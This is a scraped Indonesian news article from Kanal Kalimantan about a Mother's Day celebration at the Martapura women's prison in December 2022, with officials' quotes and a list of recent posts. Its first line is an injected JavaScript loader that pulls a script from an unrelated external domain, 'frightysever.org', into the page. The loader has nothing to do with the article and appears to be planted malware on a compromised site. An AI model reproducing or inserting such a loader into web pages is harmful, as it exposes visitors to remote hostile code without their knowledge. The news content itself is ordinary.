(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Hari Ibu di Lapas Perempuan Kelas IIA Martapura, Kalapas: Dulunya Sangkar Menjadi Sanggar


KANALKALIMANTAN.COM, MARTAPURA – Suasana haru nampak terlihat di wajah warga binaan penghuni Lembaga Pemasyarakatan (Lapas) Perempuan Kelas IIA Martapura ketika dinyanyikannya lagu ibu.

Memperingati Hari Ibu pada 22 Desember 2022, Lapas Perempuan Kelas II A Martapura menggelar berbagai rangkaian bagi petugas Lapas dan warga binaan pada Selasa (20/12/2022).

Kepala Lapas Perempuan Martapura, Lilis Yuaningsih mengatakan, kegiatan Hari Ibu di Lapas Perempuan Kelas II A Martapura ini berlangsung dari 1 hingga 20 Desember 2022.

“Kita memberdayakan semua warga di Lapas Perempuan untuk berpartisipasi dalam rangkaian kegiatan ini. Dengan adanya kegiatan ini diharapkan warga binaan dapat lebih menghargai peran seorang ibu, yang telah melahirkan dan membesarkan kita serta dapat memotivasi warga binaan menjadi pribadi yang lebih baik lagi kedepannya,” ujarnya.

 

Baca juga  : Amankan Jalan Lintas Provinsi saat Nataru, 200 Personel di Lamandau Disiagakan

Diakuinya, kegiatan seperti ini jarang dilaksanakan, apalagi beberapa tahun belakangan karena diterpa pandemi Covid-19.

Dirinya mengatakan, Lapas Perempuan ingin menghadirkan sosok seorang ibu bagi warga binaan di Lapas Perempuan Martapura.

“Di sini belum terprogram spesial untuk hari ibu, cuman mereka menganggap apa yang kami lakukan sebagai sosok pengganti orangtua bagi mereka,” katanya.

Diungkapkan Lilis, pola pembinaan di Lapas Perempuan Kelas II A Martapura sudah berubah yang dulunya sangkar sekarang menjadi sanggar.

“Kita kepada warga binaan itu sekarang seperti orangtua, teman dan anak,” tuntasnya.

Baca juga  : IAY Darul Azhar Kedatangan Rombongan Kemendes PDT dan Transmigrasi RI

Sementara itu, Kepala Divisi Pemasyarakatan Kantor Wilayah Kementerian Hukum dan Hak Asasi Manusia Kalimantan Selatan, Sri Yuwono mengatakan, tugas Lapas saat ini selain mengamankan juga pembinaan.

“Saya senang melihat beberapa Lapas mengadakan peringatan, karena peringatan itu adalah momen untuk menghadirkan potensi-potensi warga binaan dari hasil binaan, seperti produksi amplang yang sudah dipasarkan di Shopee,” jelasnya.

Sri Yuwono mengatakan, selain mengaktualisasikan hasil-hasil pembinaan di dalam. Juga hiburan, yang bertujuan untuk mengembalikan mental warga binaan yang awalnya down menjadi tumbuh dan semangat kembali.

Tak lupa Sri Yuwono juga mengucapkan, selamat atas peringatan Hari Ibu ke-94, selalu ingatlah dengan ibu, karena ibu tidak hanya ikut partisipasi berbangsa dan negara tetapi adalah kebanggaan semua anak-anaknya.(Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

12 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

13 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

14 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

15 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

19 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

21 jam ago

This website uses cookies.